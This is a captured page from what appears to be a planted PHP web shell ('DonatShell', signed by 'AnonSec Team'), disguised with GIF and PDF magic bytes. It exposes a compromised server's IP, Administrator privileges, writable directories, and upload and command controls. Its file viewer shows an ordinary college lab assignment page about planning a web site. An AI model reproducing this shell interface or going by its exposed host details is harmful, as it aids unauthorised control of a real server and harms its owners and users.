GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST1021/Labs/Lab13/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST1021/Labs/Lab13//Lab13.phpinc
<?
// JimMartinson/CST1021/Labs/Lab04/Lab04.phpinc

$css .= ',colorCode.css';
require( 'Gradebook/EvaluationSubmission_BEGIN.phpinc' ); // Replaced.
require( 'common/Browser/Browser.phpinc' );

$disabled = '';
$disabled = ' disabled';
#require('JimMartinson/DisableLab.phpinc');

?>
<fieldset>
	<legend>Description</legend>
	The purpose of this lab is to demonstrate your ability to plan a web site.
	<?=$gradeNote?>
	<? if ( $disabled ) { ?>
	<span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span>
	<? } ?>
</fieldset>
<fieldset>
	<legend>
	<?=$evaluationType?>
	Instruction</legend>
	<table border="0" width="100%" bgcolor="#FFFFFF" cellspacing="0" cellpadding="4">
		<tr>
			<td width="100%">This lab assignment &quot;Planning Web 
				Project&quot; may be hand written and sketched.
				<div class="p">
					With any large project, planning is important.
					Therefore, some preliminary planning is necessary before starting your 
					final project.
				</div>
				<div class="p">
					The subject and content of your web site is of your 
					choosing.
					Please use good taste and judgment.
					You <b>will</b> be showing your finished web project to the rest of the class.
					Suggestions for a subject are a hobbies, sports, activities, businesses 
					(real or made up), clubs, etc.
				</div>
				<div class="p">
					Preview the <b>Web Project Final</b> assignment so that 
					you can see what it is you are working towards.
				</div>
				<div class="p">
					You will be turning in <b>at least 5 pages</b> of 
					sketches (one for each page).
					Each page must consist of a sheet of 8 
					1/2&quot; X 11&quot; paper.
					Small sketches on a single 
					sheet of paper will not be allowed.&nbsp;&nbsp; More pages are allowable.
				</div>
				<div class="p">
					To navigate from one page to another, you will need 
					links. It looks professional if the links are in a vertical or horizontal 
					arrangement.
					Most web sites place the links in the same general area 
					of each page so that it is easy for the end user to figure out the 
					navigation structure of your site.
				</div>
				<div class="p">All the pages in the site should have the same basic 
					&quot;look and feel&quot; so that the site looks whole, complete, and professional.
					Same &quot;look and feel&quot; means that in general, fonts, colors, layouts, etc, 
					look similar and contiguous between all the pages on the site.
				</div>
				<div class="p">For each individual page that comprises the web 
					site:
					<ul class="">
						<li>Hand sketch the overall layout of the page</li>
						<li>Describe what the content for each page will be.</li>
						<li>Sketch where the images, tables, lists, etc. will be on the page.</li>
						<li>Show the links on the page and where they link to.</li>
					</ul>
				</div>
				<div class="p">Turn in your assignment:
				<ol type="a">
					<li>Take a photo of your assignment pages or scan them in as images or a pdfs</li>
					<li>Place the images or pdfs in your <b>
						<?=$evaluationName?>
						</b> folder.</li>
					<li>Zip up your <b>
						<?=$evaluationName?>
						</b> folder into a file named <b>
						<?=$uploadFilename?>
						</b>.</li>
					<li>Browse and select your <b>
						<?=$uploadFilename?>
						</b> file:
						<input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>>
						<div id="divFileploadError"></div>
					</li>
					<li>Then
						<input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>>
						for grading.</li>
				</ol>
				</div>
				<div class="p"><b><a href="examples/index.html">Sample student 
					sketches</a></b> from past semesters. </div>
				<div class="p">Your instructor will go over your turned in 
					assignment in class to make suggestions and improvements.<br>
					It will be graded promptly&nbsp; and returned to you in class. </div>
				<div class="p"><a href="http://mmdt1021a.ridgewater.net/samples/index.htm"><b>Sample student 
					web projects</b></a> from past semesters. </div></td>
		</tr>
	</table>
	<? if ( $disabled ) { ?>
	<span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span>
	<? } ?>
</fieldset>
<?
$PartialGradingCriteria = '<table>
	<tr>
		<td><b>Criteria</b></td>
		<td style="text-align:right;"><b>Points</b></td>
	</tr>
	<tr>
		<td>Navigation structure clear and consistent.</td>
		<td style="text-align:right;">1</td>
	</tr>
	<tr>
		<td>Text displayed in a different fonts, sizes, and colors<br>
			An external style sheet is used to do this. </td>
		<td style="text-align:right;">1</td>
	</tr>
	<tr>
		<td>At least one ordered or unordered list and at least one table.</td>
		<td style="text-align:right;">1</td>
	</tr>
	<tr>
		<td>At least 5 pages of content, at least 5 images used, and a background color or a background image is used.</td>
		<td style="text-align:right;">1</td>
	</tr>
	<tr>
		<td>Assignment in on time.</td>
		<td style="text-align:right;">1</td>
	</tr>
	<tr>
		<td style="text-align:right;"><b>Total points:</b></td>
		<td style="text-align:right;"><b>5</b></td>
	</tr>
</table>
';
?>
<script src="/js/colorCode.js"></script> 
<!--
<fieldset id="notes"><legend>NOTES:</legend>
<b>We will be using the following in every html page throughout this class:</b>
<ul>
	<li>The HTML 5 DOCTYPE: <span class="highELE">&lt;!DOCTYPE html&gt;</span>.</li>
	<li>An html tag with <span class="highATT">lang</span> attribute: <span class="highELE">&lt;html <span class="highATT">lang="<span class="highVAL">en</span>"</span>&gt;</span>.</li>
	<li>A <span class="highELE">title</span> tag.</li>
	<li>The meta character set tag <span class="highELE">&lt;meta <span class="highATT">charset="<span class="highVAL">utf-8</span>"</span>&gt;</span>.</li>
	<li>An <span class="code highELE">h1</span> heading tag with the same content as in the <span class="code highELE">title</span> tag as the first element in the body.</li>
</ul>
</fieldset>
-->
<?
require( 'Gradebook/EvaluationSubmission_END.phpinc' ); // Replaced.
#require('../../ReferencesResources.phpinc');
#require($Instructor['Path'].'/ContactInformation.phpinc');
if ( $TRACK != '' )$_SESSION[ 'TRACK' ] .= "<li>End " . basename( __FILE__ ) . "</ol>\n";
?>

Anon7 - 2022
AnonSec Team